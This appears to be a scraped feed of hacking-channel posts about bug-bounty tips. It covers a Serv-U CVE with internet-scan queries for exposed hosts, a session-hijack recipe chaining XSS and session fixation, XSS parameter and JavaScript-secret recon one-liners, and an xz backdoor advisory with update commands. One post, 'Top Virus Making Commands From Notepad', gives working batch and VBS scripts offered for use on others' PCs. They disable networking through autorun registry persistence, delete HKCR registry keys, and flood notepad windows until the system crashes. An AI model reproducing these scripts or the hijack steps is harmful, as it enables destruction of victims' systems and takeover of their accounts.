Bug bounty Tips

CVE-2024-28995: High-Severity Directory Traversal Vulnerability affecting SolarWinds Serv-U. SolarWinds Serv-U was susceptible to a directory transversal vulnerability that would allow access to read sensitive files on the host machine. POC: https://github.com/rapid7/metasploit-framework/pull/19255 Query:

Hunter: protocol.banner="Serv-U FTP"
FOFA: app="SolarWinds-Serv-U-FTP"
SHODAN: product:"Serv-U ftpd"

🦠Top Virus Making Commands From Notepad🦠 🟣1. Disable Internet Permanently :- echo @echo off>c:windowswimn32.bat echo break off>c:windowswimn32.bat echo ipconfig/release_all>c:windowswimn32.bat echo end>c:windowswimn32.batreg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /freg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /fecho You Have Been HACKED! PAUSE 🃏Action :- This code will disable the internet connectivity permanently. 🟣2. Delete Key Registry Files :- @ECHO OFF START reg delete HKCR/.exe START reg delete HKCR/.dll START reg delete HKCR/* :MESSAGE ECHO Your PC has been crashed.Your Dad. GOTO MESSAGE 🃏Action :- This will delete key registry files, then loops a message This is dangerous and unrecoverable Notepad Virus. 🟣3.Endless Notepads :- @ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top 🃏Action :- This will pop up endless notepads until the computer freezes and crashes 🟣4. Popping Cd Drive :- Set oWMP = CreateObject(”WMPlayer.OCX.7″) Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count – 1 colCDROMs.Item(i).Eject Next For i = 0 to colCDROMs.Count – 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 100 loop 🃏Action :- This will make the CD drives constantly pop out 🟣 5. Endless Enter :- Set wshShell = wscript.CreateObject(”WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “~(enter)” loop 🃏Action :- This will make the enter button pressed continuously 🔰Save All With Extension . bat ⚠️Note :- I am Not Responsible For Any Damaged Of Your Computer Want 50 reaction in this post family 🫂

Guys, please tell me your thoughts on this I am planning to start a video explanation on BugBounty hunting so what are thing I need to change and all please let me know guys

Guys check this out, a book summary app where you guys can start reading at your free time, I loved this app and I hope you guys also love this if yes give a reactions https://dsta.sh/mnA6TcBrYYingNzm7

Bug Bounty Hint How to Perform Session Hijack with XSS + Session Fixation When the Session Cookie is HttpOnly Steps: 1) Create a session cookie with an unauthenticated session value on the /login path using JavaScript. 2) Force the user to log out. 3) When the user logs back in, they will use the unauthenticated session. Details: The attacker creates a session cookie on another browser, then injects that session into the victim's account by overriding the existing HttpOnly cookie with a similar cookie name but a different value on a different path. sess=aaaa; path=/login; expires=Fri, 17 Jun 2024 10:00:00 When the login form is submitted, it will contain two cookies. The one created with JavaScript on the /login path will be first, followed by the HttpOnly cookie on the different path /. Cookie: sess=aaaa; sess=bbbb; Since the website has a Session Fixation bug, no new session will be generated when the user logs in. Because there are two session cookies, only the first one from the attacker (sess=aaaa) will be used, and the logged-in user will be attached to it. The final step is to use the unauthenticated session that was previously created on the attacker's browser for all website actions from the attacker's side. Cheers!

Arjun + KXSS Finding - Parameter - XSS arjun -q -u target -oT arjun && cat arjun | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | kxss #bugbountytips #bugbounty

Guys happy to share today that my blog is back again https://Book.cipherops.xyz you guys can check and let me know your thoughts and don't forget give the comments

[ XZ backdoor - CVE-2024-3094 ] ! Backdoor in upstream xz/liblzma leading to SSH server compromise ! Check:

xz --version

5.6.0 & 5.6.1 — v u l n e r a b l e Update:

sudo apt update && sudo apt install --only-upgrade liblzma5

Summary: https://boehs.org/node/everything-i-know-about-the-xz-backdoor How it all started (email): https://www.openwall.com/lists/oss-security/2024/03/29/4 GitHub Thread: https://web.archive.org/web/20240329223553/https://github.com/tukaani-project/xz/issues/92 Message from Kali Linux team: https://twitter.com/kalilinux/status/1773786266074513523 The xz package, starting from version 5.6.0 to 5.6.1, was found to contain a backdoor. The impact of this vulnerability affected Kali between March 26th to March 29th. If you updated your Kali installation on or after March 26th, it is crucial to apply the latest updates today. Note that (almost) all Linux distros could be affected! For example, Fedora — Red Hat warned users to immediately stop using systems running Fedora development and experimental versions: https://www.bleepingcomputer.com/news/security/red-hat-warns-of-backdoor-in-xz-tools-used-by-most-linux-distros News: https://www.helpnetsecurity.com/2024/03/29/cve-2024-3094-linux-backdoor And from CISA: https://www.cisa.gov/news-events/alerts/2024/03/29/reported-supply-chain-compromise-affecting-xz-utils-data-compression-library-cve-2024-3094 So... JiaT75 made 750 commits in 2 years and finally backdoored XZ...

Today, we'll talk a bit about JavaScript recon in web applications. I've based my methodology on My Javascript Recon Process - BugBounty. Collecting links to JS files can be done using gau:

gau example.com | grep -iE '\.js' | grep -ivE '\.json' | sort -u >> exampleJS.txt

Alternatively, you can use waymore, which seems to be better:

python3 waymore.py -i example.com -ko "\.js(\?|$)"

We can also try fuzzing to find hidden JS files:

ffuf -u https://www.example.com/js/ -w jsWordlist.txt -t 200

The wordlist for fuzzing can be found here: https://wordlists.assetnote.io/ After that, ping the JS links as some of them may be outdated.

httpx -l exampleJS.txt -mc 200

Now, let's look for secrets in these files using SecretFinder, a tool for detecting sensitive data such as apikeys, accesstokens, authorizations, jwt, etc. in a JS file:

cat exampleJS.txt | xargs -n2 -I @ bash -c 'echo -e "\n[URL] @\n";python3 SecretFinder.py -i @ -o cli' >> exampleJsSecrets.txt

Next, using availableForPurchase.py, we can check if the domains referenced in the JS files are available for purchase. This tool, combined with linkfinder and collector, is really powerful. Sometimes developers make mistakes when writing a domain, possibly the domain imports an external JavaScript file, etc.

cat exampleJS.txt | xargs -I @ bash -c 'python3 linkfinder.py -i @ -o cli' | python3 collector.py output
cat output/urls.txt | python3 availableForPurchase.py
[NO] www.googleapis.com
[YES] www.gooogleapis.com

After executing the above command, a list of potential endpoints that were discovered in the JS becomes available for review:

cat output/paths.txt

We can also immediately check for subdomain takeover using subzy

cat output/urls.txt |grep "https\{0,1\}://[^/]*\.example\.com/[^ ]*" >> subdomainExample.txt; subzy run --targets subdomainExample.txt

Also, excellent extensions for Burp: JS Miner and JS Link Finder which perform similar tasks but in real-time, for greater coverage it's better to use both script scanning and plugins